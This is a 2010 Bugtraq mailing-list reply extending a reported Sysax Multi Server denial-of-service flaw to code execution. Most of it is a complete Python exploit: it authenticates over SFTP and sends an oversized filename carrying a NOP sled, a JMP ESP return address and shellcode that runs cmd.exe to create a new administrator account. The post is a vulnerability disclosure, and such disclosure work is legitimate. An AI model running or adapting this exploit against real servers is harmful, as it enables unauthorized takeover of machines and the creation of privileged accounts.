[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Re: Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities
- From: rob@xxxxxxxxxxxxxxxxxxxx
- Date: 26 Jun 2010 23:45:59 -0000
Assuming the server is running as admin the overflow can actually be used to
execute arbitrary code. In our example we spawn an instance of cmd.exe and
create a new admin, Billyboy, with a password of woot.
This has been tested with Windows XP SP2.
+-------- Start Exploit --------+
import paramiko
import sys
t_ip = "192.168.1.104" #target IP
t_port = 4019 #target port
password = "asdf" #Known user
username = "asdf" #password for user
transport = paramiko.Transport((t_ip, t_port))
transport.connect(username = username, password = password)
sftp = paramiko.SFTPClient.from_transport(transport)
sftp.chdir("./") #Execute a good command
buff_pen = "\x90" * 389
buff_pen += "\x65\x82\xa5\x7c" #Point EIP to JMP ESP command in shell32.dll
buff_pen += "\x90" * 3
buff_pen +=
"\xeb\x13\x5b\x31\xc0\x50\x53\xbb\x4d\x11\x86\x7c\xff\xd3\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe8\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x42\x69\x6c\x6c\x79\x62\x6f\x79\x20\x77\x6f\x6f\x74\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x20\x45\x78\x70\x41\x64\x6d\x69\x6e\x00"
#Shellcode to make a new admin, billyboy, with a password of 'woot'
buff_pen += "\x90" * 3
buff_pen += "\xcc" * (800 - len(buff_pen))
sftp.get(buff_pen)
+-------- Stop Exploit --------+